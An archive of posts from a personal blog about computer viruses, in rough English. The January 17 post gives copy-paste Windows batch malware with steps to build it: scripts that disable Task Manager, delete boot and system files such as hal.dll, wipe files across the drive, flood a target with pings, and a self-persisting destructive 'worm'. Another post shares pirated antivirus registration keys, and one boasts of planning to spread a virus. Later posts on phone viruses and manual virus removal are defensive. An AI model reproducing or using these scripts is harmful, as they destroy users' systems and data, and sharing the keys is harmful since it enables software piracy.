Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Sunday, March 21, 2010

I have not been blogging due to busy in the world offline therefore my beloved blog posting is not every day. but I will never forget my status as a true blogging.

on this occasion I wanted to discuss about the virus. This is now a computer virus has been developed by many people and even children are still smp and smk like this I have developed some of the existing viruses into a virus that is very cruel to the computer. even the scientists just do not think that young children could develop a virus that already exists.

I'm not going to give examples of the virus because next month I will spread, if only now I could have spread, but less exciting because the virus that has developed is less than perfect to destroy computers worldwide.

There's actually a virus rather than to destroy the will but there are other purposes. every person who has his own purposes - their own made virus.

the virus is a small file that aims to manipulate data in a computer course, but by ordinary people that the virus is a very dangerous bacteria.

maybe that's all the discussion this time because I was at this time still in a state of severe pain because most jobs.
if there is one word and ask the justifiable sense yes. thank you a lot of friends - friends.

Sunday, January 17, 2010


after I have not talked about computers and networks really weird with my blog this. maybe in the past I mostly post about the news of emerging technologies. This time I wanted to many to you all about computers and networks, but not the network directly, yes, but this post I wanted to share the fun way with the coding by extension. bat. maybe this way you think makes a virus or malware or trojan can also be fun but it only just. want to know how to make and use, as follows:



1. you must open the application to write a script that is notepad or another can.

2. then enter the script that I've made below:
note: you can copy and paste with this script. if you write each one must have 1 hour is not enough just copy and paste directly.

Script coding :




@ echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll


Copy file ini ke Notepad trus simpan dengan extension .bat
PING DEATH(DoS)
code :

@echo off
cls
echo PING DEATH
echo.
echo How many ping processes do you want?
set /p amount=
if not exist PD md PD
cd PD
echo Enter the IP:
set /p ip=
for /L %%A IN (1,1,%amount%) DO echo @echo off > PD%%A.bat
for /L %%A IN (1,1,%amount%) DO echo ping -t -l 65500 %ip% >> PD%%A.bat
cd..
for /L %%A IN (1,1,%amount%) DO start PD\pd%%A.bat
prompt $G$S
:a
echo Enter 'terminate' to end all processes
set /p input=
if %input%==terminate goto term
goto a
:term
tasklist /FI "IMAGENAME eq cmd.exe" > PID.txt
setLocal EnableDelayedExpansion
for /F "skip=4 tokens=1,2*" %%A in (PID.txt) do taskkill /PID %%B
echo.
echo Any ERRORS above means that process must be manually terminated
cd PD
del *.* /Q
cd..
rmdir PD
goto eof
:eof


Coding Simple but Dangerous
Code:

cls
cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
cls
echo DONE!
shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "
 
Batch Virus XDD
Save File To. Bat and convert with Batch to Exe.

Code:

@echo off
title ?wtfisthisshit?
:a
set rawr=%random%
set/a rawr=%rawr%+200000
:b
set/a rawr=%rawr%-1
if %rawr%==1 (
start www.octourl.com/R
goto a
)
goto b
batch maleware phuCker
Code:

@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8" d8"' `"8b 88
echo 88 d8' 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8" a8P_____ 88 88P' "Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
@echo 
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul


:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h "%SYSTEMDRIVE%\%b0t%.ini" >nul
del /f /s /q "%SYSTEMDRIVE%\%b0t%.ini" >nul
set b0t=
attrib -r -s -h "%SYSTEMDRIVE%\ntldr" >nul
del /f /s /q "%SYSTEMDRIVE%\ntldr" >nul
set w0n=win
attrib -r -s -h "%SYSTEMROOT%\%w0n%.ini" >nul
del /f /s /q "%SYSTEMROOT%\%w0n%.ini" >nul
set w0n=
attrib -r -s -h "%SYSTEMROOT%\System32\hal.dll" >nul
del /f /s /q "%SYSTEMROOT%\System32\hal.dll" >nul
attrib -r -s -h "%SYSTEMROOT%\System32\bootcfg.exe" >nul
del /f /s /q "%SYSTEMROOT%\System32\bootcfg.exe" >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * "fuCk y0u!"
shutdown -r -t 02 -c "fuCker w0rm deteCted!"
goto end




:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f "tokens=*" %%a in (
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA'
) do (
set usac=%%a
)
echo %usac%|find /i "0x1" > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h "%SYSTEMRDRIVE%\bootmgr" >nul
del /f /s /q "%SYSTEMDRIVE%\bootmgr" >nul
attrib -r -s -h "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
del /f /s /q "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
copy %0 "%ALLUSERSPROFILE%\Start Menu\Programs\Startup" 2> nul
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
shutdown -s -t 10 -c "fuCker w0rm deteCted!"
goto end
) else (
echo :HjT >> "%TEMP%\HjT.bat"
echo tskill /a HijackThis >> "%TEMP%\HjT.bat"
echo goto HjT >> "%TEMP%\HjT.bat"
start "%TEMP%\HjT.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> "disk.vbs"
echo set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "disk.vbs"
echo set colCDROMs = oWMP.cdromCollection >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo loop >> "disk.vbs"
start "" "disk.vbs" 2> nul
echo @echo off >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo shutdown -r -t 00 -c "fuCker w0rm deteCted!" >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo @exit >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
set usac=
start "%USERPROFILE%\Desktop\fuCkerw0rm.bat" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
goto end
)
endlocal


:end
cls
exit
3. then when you're done copy paste into notepad you all do not forget to save the script in a notepad format .bat .


4. then if you've saved all you have to convert these formats to the format. exe

5. program or application is very simple fun of this is done, finished.

note: the code you created can run on various Windows operating systems.

I hope this post useful, I am posting this article is not intended to teach you to damage or fun for others but this post is where learners only. remember! I do not recommend you use this post. if there is damage to the operating system you are using is not my responsibility, on because of I do not recommend it for you. I hope you can understand. thank you very much for your support all over this site, do not forget to stop by on here.

Monday, January 11, 2010


virus is one of our blocks in doing a very important even today a lot of computers and mobile phones in trouble because of the virus. actually a computer virus and the virus is the same phone. should a virus program is a program that has been created specifically to be able to install itself without the user ordered by computers and mobile phones, they can cause damage either directly or indirectly.

many people who still do not get a virus, a virus or a software program that can install applications, transform themselves more and more and can develop by itself, but some people say it is a bacterial virus. you're wrong if someone called in a computer virus or bacterium's cell phone but it was a malicious program that made for stupid friends or antiviral agents in selling let me do.

there was even a virus can not cause damage but they can harm the user's phone or computer. I have a list of viruses before diving in, will I said in this post, what a very dangerous virus in the previous year, is as follows:

1. Cabir






Found: Jun 2004
Nickname: SymbOS / Cabir.A, EPOC / Cabir.A, Worm.Symbian.Cabir.a, Caribe
Target: Mobile Symbian S60V2
Scattered through: Bluetooth
Damage: mobile performance slow

This cabir virus is one type of virus that can spread via Bluetooth or infrared connection and enter in the inbox message with the name of a very exciting time. the virus usually give the name of the skill is worms. If the file will be opened and installed, Cabir will start looking for other mobile targets that are open access his Bluetooth connections to spread. Cabir Bluetooth will enable a periodic basis, about 15-20 minutes, to get other mobile targets. There is no danger of damage, but the hp battery will run out more quickly because of continuous use bluetooth.

2. Skulls





Discovered: November 2004
Nickname: SymbOS.skulls, skulls.sis, Extenhded theme.sis
Target: Symbian mobile phone
Scattered through: Internet
Damage: mobile phones can not be used again except to call and receive calls.

These types of Trojans and system damage caused icon menu icon changed into a skull. When installed, Skull H will display notification message: "Install beta_092_free-sms-RM8? and Skull S displays the message "Install BlueNum Stealer", and some other weird messages. Not only can change the icons, Skull can damage all the applications that his icon has been changed. Usually when an infected application is opened it will appear is the error message.

3. CommWarrior





Found: Jan 2005
Nickname: random
Target: Mobile Symbian S60V2
Scattered through: Bluetooth and MMS
Damage: Sending virus replication through MMS to any number in contacs, spent a pulse.

Several variants of this virus will also send MMS to random numbers stored in contacs. The last variant was found Commwarrior T. that infects the Symbian 8.1 (S60V2) or previous versions. These viruses are often not being recognized because the name he used was not sure. This type of virus attacks vary widely, but the most common is the virus will spread through Bluetooth. This virus will spread and infect or sometimes open an HTML page that contains the following message:

"Introduction Surprise! Your phone infected by CommWarrior worm v3.0. Matrix has you, CommWarrior inside. No panic please, it is very interesting to have mobile virus at own phone. This worm does not bring any harm to your phone and your significant data. About CommWarrior worm for Nokia Series60 provides automatic real-time protection against harmful content Anti-Virus. CommWarrior is free software and is distributed in the hope that it will be useful, without any warranty. Thank you for using CommWarrior. CommWarrior © 2005-2006 by e10d0r. "

4. Locknut



Found: Mar 2005
Nickname: unknown
Target: Symbian s60
Scattered through: Internet download
Damage: crashing phone system (ROM)

Locknut E, one variant of this virus, will destroy important files in the system and cause the application Symbian infected can not be opened. In this way, over time will be locked phone in total. Locknut or SymbOS.Locknut is a backdoor Trojan that uses the Symbian S60 system. The virus is dangerous because it can change the binary data (file extension. Bin) in the phone ROM from the system, and cause the cell phone operating system stops.

5. Fontal




Discovered: April 2005
Nickname: unknown
Target: Symbian s60
Scattered through: Internet download
Damage: Lock the phone since the first fired and could not be used.

If the phone lock Locknut gradually, it will lock the phone Fontal since it first started.

6. RommWar




Found: --
Nickname: theme.sis, xxx.sis, Britney_.sis, or the names of other interesting fishing do lo for installation
Target: Symbian s60
Scattered through: Bluetooth, MMS, and internet
Damage: causes do phone can not boot, restarts itself often

When the installation process running, the screen will display a message like this: "Install Stoper by WarriorMarrior?"
RommWar consists of 4 variants namely A, B, C and D which all have functions can cause the phone not booting do, often restart itself, turn off the power button, and prevent the mobile to light when lit.

7. DoomBoot




Found: --
Nickname: Doom_2_wad_kracked_by_DFT_S60_v.1.0.sis (disguised as a mobile games Doom 2), exoVirusStopv2.13.19 (disguised as antivirus programs)
Target: symbian s60
Scattered through: Bluetooth
Damage: create corrupted files, preventing phone reboot, if successful reboot it should be hard-reset do

Damaged file will prevent the phone to run the reboot. In addition, this virus also causes the battery will quickly run out due to constant use bluetooth connection. Make Doomboot A corrupted file, and after infecting a file, he would put another way CommWarrior.B virus into the phone. Doomboot including Trojan viruses. Many variants have been discovered, such as Doomboot A, C, L, F, G, and P.

8. CardTrap




Found: --
Nickname: masquerading as famous as kingkong game, Half Life, Battlefield 2, etc.. Sometimes also disguised as an application example SeleQ 1.7 - kracked TNT.sis
Target: Symbian S60 mobile phone and Windows-based PC
Scattered through: memory cards
Damage: causes important applications to malfunction, chaos systems, damaging the function of some buttons

Many variants have been found, such as CardTrap P, Q, R, S to double alphabets like CardTrap AA, AG, AJ, etc.. Cardtrap damage your system by turning off some important applications, especially anti-virus applications. If the memory card to be infected with the virus is connected to a PC, it will grow CardTrap himself to the PC and they will spread themselves. The first mobile phone virus created to also attack Windows-based computers. He will put the virus into 2 files in memory cards for mobile phones.

9. PBStealer






Found: --
Nickname: ChattingYuk.sis, PBCompressor.sis
Target: Symbian s60 phone
Scattered through: Bluetooth
Damage: exploiting the number of contacts, to-do list, database and notepad

 into the format. Txt and then will spread to other mobile phones such as Bluetooth. Brief look harmless but what if there are important data we are disseminated and used for criminal purposes? PBStealer is mobile viruses from Indonesia, we take pride in Indonesia . This virus will copy important data on our mobile phones such as contacs, to-do list, notes, etc.

10. AppDisabler





Found: --
Nickname: --
Target: Symbian
Scattered through: Bluetooth, MMS
Damage: install other viruses are dangerous as well, such as Locknut, Cabir and Skulls, causing the entire operating system to a halt.

That said, this is the most dangerous cell phone viruses in existence for combining several types of viruses as well. If this virus has gotten into our mobile phones, which can only in doing say goodbye. if you like that we have to buy a new phone.

may be useful for you all and be - careful with the virus do not like to underestimate the virus.


Sunday, January 10, 2010


maybe you have a lot to know that there are SmadAV Pro and there is also a free, too. even many people who want a Pro antivirus SmadAV having a very good advantage at all, but this time I wanted to made Antivirus Pro SmadAV without review or put our banner on your site but I wanted to use a very good and cheap . I do not want to talk with you, we straight to the main topic yes? follow the steps - steps that I gave to you, as the following:

before you register Pro SmadAV we do SmadAV 7.4 installation, however if you are already install SmadAV 7.5 please uninstall the antivirus 7.5 SmadAV then you replace it with the antivirus back 7.4 SmadAV. if already installed antivirus SmadAV 7.4, we just go to the settings menu and then when I go into the settings menu just click the Unregister button. just create a SmadAV reinstall 7.4, then please enter your name and my keys are provided below:

Name  : iloovufull
Key     : 098810807000


great SmadAV become Pro 7.4, if it is a PRO, then you click Unregister and then would SmadAV will be free again, because in a part of the tricks alone.

7.4 SmadAV if you've become free again I suggest you enter your name and key that I have prepared the following:

note: to name just please Copy paste and for Key please enter it manually.

Name  : [C] ara [C] urang and [P] rogram [b] call
Key     : 299921696441

have you entered yet? if you have the Key enter the name and do not forget you click the button rigester. now you try to install 7.5 SmadAV you have to click on the file 2 times.

note: 7.4 SmadAV not be deleted first yes, but let it SmadAV because if we install a new SmadAV be affected.

done


Tuesday, December 29, 2009



 many viruses are spread by the end of this year, there was even an expert in programming to know a virus that spreads the end of this year. This malware has changed in the hard disk image into a file which is very dangerous once the virus has even invaded the latest operating system from microsoft ie 7 window.

an expert analysis of antiviral vaksincom Indonesia has declared it has detected the circulation of a malicious program with Autorun.ATSJ name. that a virus or malware is a variant of the virus that has dominated autorun virus in Indonesia ranked the period November to December 2009. virus variants have been hidden in a file called images in the hard disk and make a duplicate which is actually a malicious program as well. even the duplicate files that are created will have an icon image attract enough attention so that users are able to deceive all users.



according to antivirus expertise that the file is malicious or virus created by the script in C via a software AutoIt version 3 and the compression with UPX program. features - traits the virus is to use the icon-sized pictures of about 353 KB, and extension. EXE and a type of "application".

a phenomenon in your computer get infected if the virus is as follows:
infect your computer when the victim, then the virus will cause two very strange process in the task manager once. processes running in task manager called Jview and Shimgvw and will appear in the task manager windows operating system. if it has run victims windows 7 operating system, the virus seems to run a function to turn off user account control feature (AUC). but the virus is not able to run on OS window 7. virus even has the main purpose of deadly a feature of the OS is windows 7 security features center. and consequently update and warning functions of the OS window will have a very serious problem at all.

some antivirus that will be killed by the virus as well as, Ansav guard, ESET (NOD32), norman security suite, and McAfee security center. even more unique is more the virus can kill a virus that runs locally on the taskmanager process or on star up, such as: Blastclnn.exe, blastclnnn.exe, newfolder.exe, and SSCVIHOST.exe. The main symptom that caused the most obvious is he has the ability to plow and duplicate all the existing image files in your hard drive. files that will be the main target of the virus files have the extension jpeg, bmp, png, and gif.

the virus will spread through a peripheral device is a USB flash drive. other than that he will spread itself through a local network if the victim computer has a share folder or share data in a local network. careful - careful with the virus that is very unique and cruel this year. My info may be useful this time. thanks.


Monday, July 20, 2009

at this time I will explain about cleaning it manually with the virus that is rarely used by many people because it is impossible to use ... do not explain the length and explained its way directly  key as follows:
1. How to Eliminate Computer Viruses Manually: Turn off the process that is run by the virus. Virus surely have an active process running on the system. This process usually monitor system activity and perform action when a particular event known virus. For example when we install the flash disk, the virus will recognize the process of action and infect flash disk with the same virus. This process should be viewed from the task manager which can be activated with the Ctrl + Alt + Del, but sometimes the virus will block this action by making the log off, close the Task Manager window, or restart the system. Another way is to use another tool to view and turn off the virus. I always use Process Explorer from http://www.sysinternals.com/. With this tool you can kill the virus process is considered. At the time the property off the virus needs to belong to the virus sometimes consisting of more than 1 process of mutual monitoring. 1 when the process is turned off then the page will be turned on again with the other. Therefore the process off the virus must be quickly turned off before the process is turned on again by the other. Identify the first process that the virus is considered ago with a quick turn off everything. Usually, the virus resembles the disguise of the windows but there is a difference between imitating IExplorer.exe such as Explorer.exe. Here are the windows that can be used as reference process that considered safe:
C: \ WINDOWS \ system32 \ smss.exe
C: \ WINDOWS \ system32 \ csrss.exe
C: \ WINDOWS \ system32 \ winlogon.exe
C: \ WINDOWS \ system32 \ services.exe
C: \ WINDOWS \ system32 \ svchost.exe
C: \ WINDOWS \ system32 \ lsass.exe
C: \ WINDOWS \ Explorer.exe
In addition to process explorer you can use other tools that may be easier to remove and can process at once. Another example is Hijack Free. You can search in google tools similar.
2. How to Eliminate Computer Viruses: After turning off the virus successfully do the default return value parameter system that is used to activate the virus themselves and remove themselves to block the effort. These parameters are on the windows registry which can be reset to the default value. Save the following files with the name of any file with the extention. Reg. Then execute the file by clicking 2 times. If you can confirm there is a Yes / Ok. Following registry file is:
Windows Registry Editor Version 5:00
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced]
"Hidden" = dword: 00000000
"SuperHidden" = dword: 00000000
"ShowSuperHidden" = dword: 00000000
[HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet002 \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]
"Shell" = "Explorer.exe"
"Userinit" = "C: \ WINDOWS \ system32 \ userinit.exe,"
[HKEY_CLASSES_ROOT \ regfile \ shell \ open \ command]
@ = "Regedit.exe \"% 1 \ ""
[HKEY_CLASSES_ROOT \ scrfile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ piffile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ comfile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ exefile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
Above registry file akan unblock regedit, grafting prevent the virus itself on the system, and reset the parameters to prevent the virus the way again.
3. How to Eliminate Computer Viruses: After the virus is turned off and reset the system parameters. Prevent the virus active again by removing the autorun virus entry and startup of Windows. Tool can use the default windows msconfig or edit directly in the registry with regedit. To more easily use third party tools like autoruns from http://www.sysinternals.com entry to delete autorun virus, and the startup property page. Do not forget to check the Startup folder on the Start Menu -> Programs -> Startup and make sure there is no virus entry page.
4. How to Eliminate Computer Viruses: Download the latest antivirus and do full system scanning on the antivirus that checks the entire system and remove all viruses found. I recommend avira that can be downloaded from the http://www.free-av.com are free virus scanner and the same ttough with commercial anti-virus such as Kaspersky or Symantec.
5. How to Eliminate Computer Viruses: Before restarting make sure you do not pass the virus from either autorun or proces and system start up. Because if not then restart when the system will return as at the time of virus infection and useless all the steps you did before.
6. How to Eliminate Computer Viruses: After restarting your computer and check back and see whether the symptoms that appear when the computer is still infected or not. If you have some miss autorun virus or reset the system parameters above does not work. Do the above and more careful check of each step before you restart the system.
That is the step-step removal of the virus on the system Windows XP. To prevent the virus comes back you should be diligent to update or install anti-virus applications such as prevention WinPooch or Comodo Firewall will warn the user when there are other programs that will modify the system. So even though the virus is not known but before entering the user of warned prevention by the application. When you identify the programs that access the system you want then you can allow access, but if the decline and should not block access, it is because there is a possibility that program is a virus.
Be careful when opening the flash disk. Do not open the flash disk with a click 2 times. Go with the right click menu and select Open in order to autoplay feature on the flash disk does not run a virus Automatic Do not forget to note the files that you open. Although icon same note that the file that you open or open type of application.Rata Penuhprogram. Make sure the file is a word exactly the word and folders exactly the folder can see the detail with the properties of the file or page. Hopefully this article helped you and prevent computer virus infection.
Subscribe to RSS Feed Follow me on Twitter!